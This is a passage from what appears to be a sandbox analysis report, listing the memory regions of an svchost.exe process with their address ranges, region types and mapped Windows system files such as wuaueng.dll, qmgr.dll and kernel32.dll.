(normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 498 start_va = 0x480000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 499 start_va = 0x490000 end_va = 0x493fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 500 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 501 start_va = 0x4b0000 end_va = 0x637fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 502 start_va = 0x640000 end_va = 0x7c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 503 start_va = 0x7d0000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 504 start_va = 0x890000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 505 start_va = 0x8c0000 end_va = 0x8cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 506 start_va = 0x8d0000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 507 start_va = 0x950000 end_va = 0x957fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 508 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 509 start_va = 0x970000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 510 start_va = 0x980000 end_va = 0x999fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 511 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 512 start_va = 0x9b0000 end_va = 0x9b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 513 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 514 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 515 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 516 start_va = 0x9f0000 end_va = 0xa0bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 517 start_va = 0xa10000 end_va = 0xa15fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netcfgx.dll.mui" filename = "\\Windows\\System32\\en-US\\netcfgx.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netcfgx.dll.mui") Region: id = 518 start_va = 0xa20000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 519 start_va = 0xa30000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 520 start_va = 0xab0000 end_va = 0xab0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 521 start_va = 0xac0000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 522 start_va = 0xb40000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 523 start_va = 0xbc0000 end_va = 0xbc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 524 start_va = 0xbd0000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 525 start_va = 0xbe0000 end_va = 0xbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 526 start_va = 0xbf0000 end_va = 0xc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 527 start_va = 0xc70000 end_va = 0xf3efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 528 start_va = 0xf40000 end_va = 0xfbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 529 start_va = 0xfc0000 end_va = 0xfc7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 530 start_va = 0xfd0000 end_va = 0xfdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 531 start_va = 0xfe0000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 532 start_va = 0x1060000 end_va = 0x10c5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 533 start_va = 0x10d0000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 534 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 535 start_va = 0x11d0000 end_va = 0x11dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 536 start_va = 0x11e0000 end_va = 0x125ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 537 start_va = 0x1260000 end_va = 0x12dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 538 start_va = 0x12e0000 end_va = 0x12effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 539 start_va = 0x12f0000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012f0000" filename = "" Region: id = 540 start_va = 0x1300000 end_va = 0x130ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001300000" filename = "" Region: id = 541 start_va = 0x1310000 end_va = 0x131ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001310000" filename = "" Region: id = 542 start_va = 0x1320000 end_va = 0x132ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001320000" filename = "" Region: id = 543 start_va = 0x1330000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001330000" filename = "" Region: id = 544 start_va = 0x1340000 end_va = 0x134ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001340000" filename = "" Region: id = 545 start_va = 0x1350000 end_va = 0x135ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 546 start_va = 0x1360000 end_va = 0x136ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 547 start_va = 0x1370000 end_va = 0x13effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 548 start_va = 0x13f0000 end_va = 0x146ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 549 start_va = 0x1470000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 550 start_va = 0x1480000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 551 start_va = 0x1500000 end_va = 0x157ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 552 start_va = 0x1580000 end_va = 0x1587fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 553 start_va = 0x1590000 end_va = 0x160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 554 start_va = 0x1610000 end_va = 0x161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 555 start_va = 0x1620000 end_va = 0x169ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 556 start_va = 0x16b0000 end_va = 0x172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 557 start_va = 0x1750000 end_va = 0x17cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 558 start_va = 0x17d0000 end_va = 0x17dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017d0000" filename = "" Region: id = 559 start_va = 0x17e0000 end_va = 0x17effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 560 start_va = 0x17f0000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017f0000" filename = "" Region: id = 561 start_va = 0x1800000 end_va = 0x180ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 562 start_va = 0x1810000 end_va = 0x181ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001810000" filename = "" Region: id = 563 start_va = 0x1820000 end_va = 0x182ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001820000" filename = "" Region: id = 564 start_va = 0x1850000 end_va = 0x18cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001850000" filename = "" Region: id = 565 start_va = 0x1900000 end_va = 0x197ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 566 start_va = 0x19b0000 end_va = 0x1a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019b0000" filename = "" Region: id = 567 start_va = 0x1a80000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 568 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 569 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 570 start_va = 0x1d20000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 571 start_va = 0x1de0000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 572 start_va = 0x1e60000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 573 start_va = 0x1ea0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 574 start_va = 0x1f00000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 575 start_va = 0x1fa0000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 576 start_va = 0x20f0000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 577 start_va = 0x2100000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 578 start_va = 0x2190000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 579 start_va = 0x22d0000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 580 start_va = 0x2360000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 581 start_va = 0x2410000 end_va = 0x248ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 582 start_va = 0x24c0000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 583 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 584 start_va = 0x2600000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 585 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 586 start_va = 0x27d0000 end_va = 0x284ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 587 start_va = 0x28d0000 end_va = 0x294ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 588 start_va = 0x2960000 end_va = 0x29dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 589 start_va = 0x29e0000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 590 start_va = 0x2a70000 end_va = 0x2aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 591 start_va = 0x2b40000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 592 start_va = 0x2bd0000 end_va = 0x2bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 593 start_va = 0x2be0000 end_va = 0x2c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002be0000" filename = "" Region: id = 594 start_va = 0x2ca0000 end_va = 0x2d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 595 start_va = 0x2d20000 end_va = 0x2e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 596 start_va = 0x2e60000 end_va = 0x2edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 597 start_va = 0x2ee0000 end_va = 0x2fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 598 start_va = 0x2fe0000 end_va = 0x31dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 599 start_va = 0x31f0000 end_va = 0x326ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 600 start_va = 0x3270000 end_va = 0x346ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 601 start_va = 0x34d0000 end_va = 0x354ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034d0000" filename = "" Region: id = 602 start_va = 0x35a0000 end_va = 0x361ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 603 start_va = 0x3670000 end_va = 0x36effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 604 start_va = 0x3710000 end_va = 0x378ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003710000" filename = "" Region: id = 605 start_va = 0x3790000 end_va = 0x388ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003790000" filename = "" Region: id = 606 start_va = 0x38c0000 end_va = 0x393ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038c0000" filename = "" Region: id = 607 start_va = 0x3990000 end_va = 0x3a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Region: id = 608 start_va = 0x3a60000 end_va = 0x3adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a60000" filename = "" Region: id = 609 start_va = 0x3af0000 end_va = 0x3b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003af0000" filename = "" Region: id = 610 start_va = 0x3b80000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 611 start_va = 0x3c00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 612 start_va = 0x4010000 end_va = 0x408ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004010000" filename = "" Region: id = 613 start_va = 0x4090000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 614 start_va = 0x4120000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 615 start_va = 0x4230000 end_va = 0x42affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004230000" filename = "" Region: id = 616 start_va = 0x42b0000 end_va = 0x436ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 617 start_va = 0x4370000 end_va = 0x43effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 618 start_va = 0x43f0000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 619 start_va = 0x44b0000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 620 start_va = 0x4570000 end_va = 0x45effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 621 start_va = 0x45f0000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 622 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 623 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 624 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 625 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 626 start_va = 0x4a00000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a00000" filename = "" Region: id = 627 start_va = 0x4b00000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 628 start_va = 0x4c00000 end_va = 0x5bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 629 start_va = 0x5d40000 end_va = 0x5dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d40000" filename = "" Region: id = 630 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 631 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 632 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 633 start_va = 0x76ee0000 end_va = 0x76ee6fff monitored = 0 entry_point = 0x76ee106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 634 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 635 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 636 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 637 start_va = 0xffa90000 end_va = 0xffa9afff monitored = 0 entry_point = 0xffa9246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 638 start_va = 0x7fef1c80000 end_va = 0x7fef1c9afff monitored = 0 entry_point = 0x7fef1c81198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 639 start_va = 0x7fef2180000 end_va = 0x7fef23d2fff monitored = 0 entry_point = 0x7fef218236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 640 start_va = 0x7fef2f10000 end_va = 0x7fef2f54fff monitored = 0 entry_point = 0x7fef2f43644 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 641 start_va = 0x7fef40c0000 end_va = 0x7fef40d1fff monitored = 0 entry_point = 0x7fef40c90bc region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 642 start_va = 0x7fef4240000 end_va = 0x7fef44b9fff monitored = 0 entry_point = 0x7fef4272200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 643 start_va = 0x7fef4710000 end_va = 0x7fef472bfff monitored = 0 entry_point = 0x7fef47111a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 644 start_va = 0x7fef4730000 end_va = 0x7fef4791fff monitored = 0 entry_point = 0x7fef4731198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 645 start_va = 0x7fef47a0000 end_va = 0x7fef47d9fff monitored = 0 entry_point = 0x7fef47a1010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 646 start_va = 0x7fef4e70000 end_va = 0x7fef4ee0fff monitored = 0 entry_point = 0x7fef4eaecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 647 start_va = 0x7fef4f90000 end_va = 0x7fef4f9efff monitored = 0 entry_point = 0x7fef4f99a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 648 start_va = 0x7fef5e60000 end_va = 0x7fef5e69fff monitored = 0 entry_point = 0x7fef5e63994 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 649 start_va = 0x7fef5f60000 end_va = 0x7fef6031fff monitored = 0 entry_point = 0x7fef5ff1a10 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 650 start_va = 0x7fef6830000 end_va = 0x7fef691dfff monitored = 0 entry_point = 0x7fef68312a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 651 start_va = 0x7fef6bf0000 end_va = 0x7fef6c31fff monitored = 0 entry_point = 0x7fef6c20048 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 652 start_va = 0x7fef6c40000 end_va = 0x7fef6c59fff monitored = 0 entry_point = 0x7fef6c51ae4 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 653 start_va = 0x7fef6c80000 end_va = 0x7fef6c8efff monitored = 0 entry_point = 0x7fef6c86894 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 654 start_va = 0x7fef8790000 end_va = 0x7fef879bfff monitored = 0 entry_point = 0x7fef879602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 655 start_va = 0x7fef8b90000 end_va = 0x7fef8b97fff monitored = 0 entry_point = 0x7fef8b91414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 656 start_va = 0x7fef8ca0000 end_va = 0x7fef8d10fff monitored = 0 entry_point = 0x7fef8ce51d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 657 start_va = 0x7fef8d20000 end_va = 0x7fef8d31fff monitored = 0 entry_point = 0x7fef8d289d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 658 start_va = 0x7fef8d40000 end_va = 0x7fef8df4fff monitored = 0 entry_point = 0x7fef8dbcf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 659 start_va = 0x7fef8e00000 end_va = 0x7fef8e18fff monitored = 0 entry_point = 0x7fef8e01104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 660 start_va = 0x7fef8e20000 end_va = 0x7fef8e6ffff monitored = 0 entry_point = 0x7fef8e21190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 661 start_va = 0x7fef8e70000 end_va = 0x7fef8e77fff monitored = 0 entry_point = 0x7fef8e71020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 662 start_va = 0x7fef8e80000 end_va = 0x7fef8ed9fff monitored = 0 entry_point = 0x7fef8ebdde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 663 start_va = 0x7fef8ee0000 end_va = 0x7fef8f00fff monitored = 0 entry_point = 0x7fef8ef03b0 region_type = mapped_file name = "wmiutils.dll" 